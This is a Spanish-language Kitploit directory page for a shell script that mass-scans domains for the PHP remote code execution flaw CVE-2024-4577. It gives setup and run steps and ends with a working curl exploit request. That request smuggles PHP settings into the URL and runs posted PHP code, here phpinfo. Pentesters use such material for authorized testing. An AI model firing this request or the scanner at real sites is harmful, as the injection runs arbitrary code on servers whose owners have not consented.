Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/graphite-org/cve-2024-4577
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

Script de shell para escanear dominios en busca de la vulnerabilidad de ejecución remota de código PHP CVE-2024-4577 mediante solicitudes POST manipuladas, exportando objetivos vulnerables para verificación manual.

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Comprobador de Vulnerabilidad CVE-2024-4577

Este script está diseñado para comprobar la vulnerabilidad descrita por CVE-2024-4577, que implica explotar ciertas configuraciones de PHP para ejecutar código arbitrario de forma remota. Envía una solicitud POST a endpoints especificados en una lista de dominios y verifica si la respuesta indica vulnerabilidad.

Uso

  1. Instalar GNU Parallel:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. Clonar el Repositorio: Clona este repositorio en tu máquina local usando Git:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. Navegar al Repositorio: Cambia al directorio clonado:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. Preparar Lista de Dominios: Crea un archivo de texto que contenga una lista de dominios a comprobar. Cada dominio debe estar en una nueva línea. Por ejemplo:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. Ejecutar el Script: Ejecuta el script CVE-2024-4577.sh, pasando la ruta al archivo de lista de dominios como argumento:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. Revisar la Salida: El script mostrará información de progreso mientras comprueba cada dominio. Si se encuentra que un dominio es vulnerable, se resaltará en rojo. El script también exportará una lista de dominios vulnerables a un archivo llamado vulnerable_domains.txt.

Archivo Exportado: vulnerable_domains.txt

El script exporta una lista de dominios vulnerables a un archivo llamado vulnerable_domains.txt. Este archivo contiene una lista simple de dominios vulnerables, con cada dominio en una nueva línea. Para confirmar manualmente, usa el comando curl para enviar una solicitud POST al endpoint objetivo en el dominio. Reemplaza https://dev.example.com/test.php con el endpoint real en el dominio objetivo.

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
Descargar herramienta